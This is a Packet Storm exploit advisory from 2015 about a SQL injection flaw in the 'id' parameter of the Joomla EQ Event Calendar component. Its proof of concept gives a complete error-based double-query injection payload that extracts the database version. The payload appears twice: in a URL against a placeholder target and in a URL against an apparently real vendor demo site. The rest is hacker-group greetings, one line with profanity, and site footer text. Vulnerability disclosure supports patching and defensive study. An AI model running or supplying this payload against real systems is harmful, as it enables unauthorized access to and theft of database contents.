Joomla EQ Event Calendar component suffers from a remote SQL injection vulnerability.
76a3371129a71f9cb4b04572956cea23364589c89e791a42bed428d1adccc645##################################################################################################
#Exploit Title : Joomla component EQ Event Calendar SQL Injection vulnerability
#Author : Manish Kishan Tanwar AKA error1046
#Vendor Link : http://codecanyon.net/item/eq-event-calendar-/11169564
#Date : 7/06/2015
#Discovered at : IndiShell Lab
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
joomla component EQ Event Calendar is not filtering data in id parameter and hence affected from SQL injection vulnerability
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to id parameter
////////////////
/// POC ////
///////////////
Use error based double query injection with id parameter
Like error based double query injection for exploiting SQL server version --->
and(select 1 FROM(select count(*),concat((select (select concat(version(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Injected Link--->
http://target.com/index.php/en/component/eqfullevent?view=lists&id=1 and(select 1 FROM(select count(*),concat((select (select concat(version(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
demo link--->
http://demo.byeqima.com/index.php/en/component/eqfullevent?view=lists&id=1 and(select 1 FROM(select count(*),concat((select (select concat(version(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
#############################################################################################
--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik)
--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed